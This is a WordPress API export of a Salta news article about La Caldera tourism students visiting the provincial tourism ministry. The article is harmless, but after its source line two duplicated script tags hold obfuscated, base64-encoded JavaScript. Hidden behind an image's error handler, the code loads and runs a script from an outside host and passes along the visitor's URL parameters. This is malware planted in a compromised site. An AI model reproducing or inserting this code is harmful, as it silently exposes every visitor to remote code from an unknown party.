{"id":1719,"date":"2022-11-03T11:22:48","date_gmt":"2022-11-03T14:22:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1719"},"modified":"2025-08-14T00:31:19","modified_gmt":"2025-08-14T03:31:19","slug":"estudiantes-de-la-caldera-fueron-recibidos-en-el-ministerio-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1719","title":{"rendered":"Estudiantes de La Caldera fueron recibidos en el Ministerio de Turismo"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#af042f\"><em>Los j\u00f3venes que cursan la modalidad de Bachiller en Turismo manifestaron inter\u00e9s por conocer las \u00e1reas que componen el organismo, fueron recibidos por funcionarios que expusieron las funciones de las diferentes direcciones.<\/em><\/h4>\n\n\n\n<p>Estudiantes de 5to del Colegio 5045 \u201cSenado Provincial\u201d de La Caldera visitaron las oficinas de la Secretar\u00eda de Turismo donde fueron recibidos por directores de las distintas \u00e1reas de la Subsecretar\u00eda de Desarrollo y Competitividad Tur\u00edstica, quienes dialogaron con los j\u00f3venes acerca de las incumbencias de la cartera y las funciones que cada \u00e1rea desarrolla.<\/p>\n\n\n\n<p>Los adolescentes, que cursan la modalidad de Bachiller en Turismo, estuvieron acompa\u00f1ados por las docentes Rosana Laguna, Andrea Castro y Silvia Su\u00e1rez quienes agradecieron la disposici\u00f3n del organismo para conversar con los estudiantes e interesarse en su formaci\u00f3n.<\/p>\n\n\n\n<p>En la oportunidad,&nbsp;<strong>Soledad Issa<\/strong>, directora General de Desarrollo de Destinos Tur\u00edsticos se refiri\u00f3 a la estructura de la Secretar\u00eda de Turismo y a las funciones de las diferentes \u00e1reas; asimismo, expuso acerca del trabajo que se desarrolla en conjunto con los municipios de la provincia; adem\u00e1s, mencion\u00f3 el diagn\u00f3stico que se realiza en el marco del Plan Liderar a fin de definir las estrategias de desarrollo y promoci\u00f3n para Salta en los pr\u00f3ximos 5 a\u00f1os.<\/p>\n\n\n\n<p>Por su parte, el director General de Competitividad y Emprendedurismo&nbsp;<strong>Carlos Stengur<\/strong>t resalt\u00f3 el trabajo del Ministerio para apoyar a los emprendedores y fomentar su desarrollo; asimismo, a\u00f1adi\u00f3 que se asesora al emprendedor y se trabaja con Turismo de la Naci\u00f3n para la obtenci\u00f3n de fondos; por otra parte, se\u00f1al\u00f3 que su direcci\u00f3n tambi\u00e9n tiene a cargo la elaboraci\u00f3n de estad\u00edsticas que son imprescindibles para la toma de decisiones.<\/p>\n\n\n\n<p>En tanto,<strong>&nbsp;Lucas Guti\u00e9rrez<\/strong>&nbsp;de la direcci\u00f3n de Productos Tur\u00edsticos indic\u00f3 que entre los productos que desde el \u00e1rea se atiende se encuentra turismo naturaleza, turismo aventura, la Ruta del Vino, turismo gastron\u00f3mico; la funci\u00f3n es desarrollar estos productos para que sean cada vez m\u00e1s visitados y realizados.<\/p>\n\n\n\n<p>Por \u00faltimo, la integrante de la direcci\u00f3n de Capacitaci\u00f3n,<strong>\u00a0Alicia Checa<\/strong>\u00a0dialog\u00f3 con los estudiantes acerca del Plan de Capacitaci\u00f3n que lleva adelante el Ministerio y cuyo objetivo es promover el crecimiento del sector tur\u00edstico adem\u00e1s de sensibilizar a la comunidad sobre el desarrollo de la actividad; Checa los invit\u00f3 a sumarse a las capacitaciones recabando informaci\u00f3n en\u00a0<a href=\"http:\/\/www.turismotecapacita.com\/\" target=\"_blank\" rel=\"noopener\">http:\/\/www.turismotecapacita.com<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/estudiantes-de-la-caldera-fueron-recibidos-en-el-ministerio-de-turismo-85929\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los j\u00f3venes que cursan la modalidad de Bachiller en Turismo manifestaron inter\u00e9s por conocer las \u00e1reas que componen el organismo, fueron recibidos por funcionarios que expusieron las funciones de las diferentes direcciones. Estudiantes de 5to del Colegio 5045 \u201cSenado Provincial\u201d de La Caldera visitaron las oficinas de la Secretar\u00eda de Turismo donde fueron recibidos por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1720,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-1719","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1719"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1719"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1719\/revisions"}],"predecessor-version":[{"id":7291,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1719\/revisions\/7291"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1720"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1719"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1719"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1719"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}